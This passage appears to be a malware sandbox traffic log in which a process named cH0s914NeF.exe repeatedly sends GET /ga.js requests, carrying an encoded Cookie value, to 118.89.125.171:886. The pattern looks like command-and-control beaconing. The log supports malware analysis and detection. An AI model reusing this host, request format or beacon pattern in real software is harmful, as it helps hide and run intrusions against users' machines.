Apr 20, 2024 15:22:25.131738901 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:25.461947918 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49744	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:25.901804924 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:26.224884987 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49745	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:26.857439041 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:27.175977945 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49746	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:27.591291904 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:27.901228905 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49747	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:28.344465017 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:28.660043955 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49748	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:29.074028015 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:29.380542994 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49749	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:29.817969084 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:30.136810064 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49750	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:30.559449911 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:30.865840912 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49751	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:31.305869102 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:31.623148918 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49752	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:32.064531088 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:32.396750927 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49753	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:32.838840008 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:33.158351898 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49754	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:33.584661007 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:33.902776003 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49755	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:34.332155943 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:34.648308039 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49756	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:35.100552082 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:35.424499035 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49757	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:35.851174116 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:36.173084021 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49758	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:36.612840891 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:36.940258026 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49759	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:37.375336885 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:37.699438095 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49760	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:38.132122040 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:38.451684952 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49761	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:38.880553961 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:39.193797112 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49762	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:39.623801947 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:39.933125019 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49763	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:40.365607977 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:40.677937984 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49764	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:41.106741905 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:41.411638975 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49765	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:41.849283934 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:42.166815042 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49766	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:42.920726061 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:43.236268997 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49767	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:43.709628105 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:44.032907963 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49768	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:44.470218897 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:44.798249960 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49769	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:45.219705105 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:45.529767990 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49770	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:45.964067936 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:46.278769016 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49771	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
